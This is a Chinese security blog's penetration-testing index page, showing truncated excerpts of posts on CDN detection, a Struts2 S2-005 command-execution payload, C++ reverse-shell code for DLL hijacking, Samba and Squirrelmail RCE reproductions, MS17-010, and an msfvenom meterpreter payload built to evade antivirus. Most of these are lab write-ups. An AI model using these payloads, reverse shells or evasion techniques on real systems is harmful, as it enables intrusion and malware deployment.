渗透测试 - baozi's Blog | 我还想再试一次

使用python判断网站cdn

时间:2018-7-21   作者:webbaozi   分类: 渗透测试   热度:133°    
时间:2018-7-21   分类: 渗透测试    热度:133  
1.前言每次遇见网站都要去判断是否存在cdn,获取真实ip,这里以自己没事搞得一个检测CDN的来说一下 2.判断方式2.1 安装模块及部分字典pip install dnspython字典: 2.2 NS判断def get_ns(url): print url try: NS = dns.resolver.query(url, ‘NS’) dlist = list(ns_list[‘ns’].keys()) ns_list_jieguo=[] print NS.response.answer[0] for k...

阅读全文>>

热门 记一次struts2-005

时间:2018-3-26   作者:webbaozi   分类: 渗透测试   热度:527°    
时间:2018-3-26   分类: 渗透测试    热度:527  
如图: 执行id参数可以成功执行,但是当命令中含有空格时执行命令就会失败。 然后调试发现把命令中的空格换成\40即可成功执行命令 这里附上s2_005的命令:('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\[email protected]

阅读全文>>

热门 c++反弹代码

时间:2017-10-30   作者:webbaozi   分类: 渗透测试   热度:1006°    
时间:2017-10-30   分类: 渗透测试    热度:1006  
在dll劫持中使用挺不错的,之前放在nopad++中,成功反弹。 代码如下: LPCSTR szMyUniqueNamedEvent = "sysnullevt"; HANDLE m_hEvent = CreateEventA(NULL, TRUE, FALSE, szMyUniqueNamedEvent); switch (GetLastError()) { // app is already running case ERROR_ALREADY_EXISTS: { CloseHandle(m_hEvent); bre...

阅读全文>>

热门 Samba远程代码执行漏洞利用

时间:2017-5-30   作者:webbaozi   分类: 渗透测试   热度:1162°    
时间:2017-5-30   分类: 渗透测试    热度:1162  
概述 linux或unix下所使用Samba服务允许恶意的用户上传类库到可读可写的共享目录进而导致服务器远程代码执行。 漏洞编号: CVE-2017-7494 漏洞等级: 严重 漏洞影响: Samba 3.5.0 和包括4.6.4/4.5.10/4.4.14中间版本 默认端口: 445 漏洞复现 1.靶机环境搭建: 靶机环境系统使用kali: IP地址:192.168.10.62 [email protected]:/# uname -a Linux yunxu 4.9.0-kali3-amd64 ...

阅读全文>>

热门 Metasploit生成免杀payload笔记

时间:2017-5-22   作者:webbaozi   分类: 渗透测试   热度:1557°    
时间:2017-5-22   分类: 渗透测试    热度:1557  
msfvenom -p windows/meterpreter/reverse_tcp LPORT=443 LHOST=192.168.2.222 -i 11 -f py -o msf.py 然后更改z.py样式如下: from ctypes import * import ctypes buf = "" buf += "\xda\xca\xb8\x17\x5d\x14\x92\xd9\x74\x24\xf4\x5d\x29" buf += "\xc9\xb1\x97\x31\x45\x1a\x03\x45\x1a\x83\x...

阅读全文>>

热门 MS17-010漏洞检测与内网穿透技术的应用

时间:2017-5-15   作者:webbaozi   分类: 渗透测试   热度:3692°    
时间:2017-5-15   分类: 渗透测试    热度:3692  
0x00 前言 本文主要介绍一下MSF模块的下载、使用,以及当攻击机处于内网,而目标机也处于内网的解决方法。这里借助MS17-010漏洞来具体讲解一下,并没有新的知识点,可以为刚入门的新手抛砖引玉,提供一条解决问题的思路,同时也记录一下过程,加强记忆。 主要分为两个知识点,一是SMB漏洞的批量检测,二是内网穿透技术。 首先是环境的搭建,具体如下表所示: 主机 IP 备注 ...

阅读全文>>

热门 Squirrelmail远程代码执行漏洞(CVE-2017-7692)复现+修复方案

时间:2017-5-14   作者:webbaozi   分类: 渗透测试   热度:1123°    
时间:2017-5-14   分类: 渗透测试    热度:1123  
一:实验环境 操作机:kali2.0 目标机:Centos 6.0 Squirrelmail版本:1.4.22-4el6 二、漏洞原理 1、有一个可以登录的邮箱账号和密码 2、Squirrelmai的MAT(因特网邮件传送代理)需要配置Sendmail 3、Squirrelmail的edit_identity配置为true(默认配置) 该漏洞的触发点位于Squirrelmail源码中的Deliver_SendMail.class.php文件中,在initStream函数中,使用了escapeshellcmd()来过滤用户的信息,然后将处理后的字...

阅读全文>>

返回顶部    首页    手机版本   
版权所有:baozi|学与用    站长: webbaozi  蜀ICP备16032848号-1